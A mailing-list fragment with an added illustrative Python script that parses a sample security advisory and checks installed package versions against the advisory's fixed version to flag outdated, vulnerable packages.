>--
>Roger Marquis
>Roble Systems Consulting
>http://www.roble.com/
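
Steps 4 and 5 of the pkg_security outline quoted earlier in this thread (extract the advisory's data, then compare it with the installed packages), as an added example that is not part of any message or of the tool itself. The "Key: value" advisory layout, the package names, the advisory id and the simplified version ordering are all assumptions made for illustration.

```python
import re
from pathlib import Path

# Constructed advisory in a hypothetical "Key: value" layout (assumption:
# its gnupg signature was already verified, step 3 of the outline).
SAMPLE_ADVISORY = """\
Advisory: EXAMPLE-00:01
Port: exampleirc
Fixed-In: 1.0c17_1
"""

def parse_advisory(text):
    """Step 4: extract the fields the check needs; reject incomplete input."""
    pairs = (line.split(":", 1) for line in text.splitlines() if ":" in line)
    fields = {key.strip().lower(): value.strip() for key, value in pairs}
    missing = {"advisory", "port", "fixed-in"} - fields.keys()
    if missing:
        raise ValueError(f"advisory lacks fields: {sorted(missing)}")
    return fields

def version_key(version):
    """Sort key from numeric/alphabetic runs plus the _N port revision.
    A simplification, not the ports tree's own comparison rules."""
    main, _, rev = version.partition("_")
    runs = re.findall(r"\d+|[a-z]+", main.lower())
    key = [(1, int(r), "") if r.isdigit() else (0, 0, r) for r in runs]
    return key, int(rev) if rev.isdigit() else 0

def installed_names(pkg_db="/var/db/pkg"):
    """Step 5 input: one 'name-version' directory per installed package."""
    return sorted(p.name for p in Path(pkg_db).iterdir() if p.is_dir())

def audit(names, advisories):
    """Report (advisory, package, version) for each installed package that
    is older than the version an advisory names as fixed."""
    parsed = [parse_advisory(text) for text in advisories]
    findings = []
    for entry in names:
        name, sep, version = entry.rpartition("-")
        for adv in parsed:
            if sep and name == adv["port"] and \
                    version_key(version) < version_key(adv["fixed-in"]):
                findings.append((adv["advisory"], name, version))
    return findings

if __name__ == "__main__":
    # Constructed package list; on a real host pass installed_names().
    sample = ["exampleirc-1.0c17", "exampletool-2.1_3"]
    for advisory, name, version in audit(sample, [SAMPLE_ADVISORY]):
        print(f"{advisory}: {name}-{version} is older than the fixed version")
```

Comparing on the port revision as well as the base version is what lets the check tell a patched rebuild (`_1`) from the vulnerable package of the same upstream release.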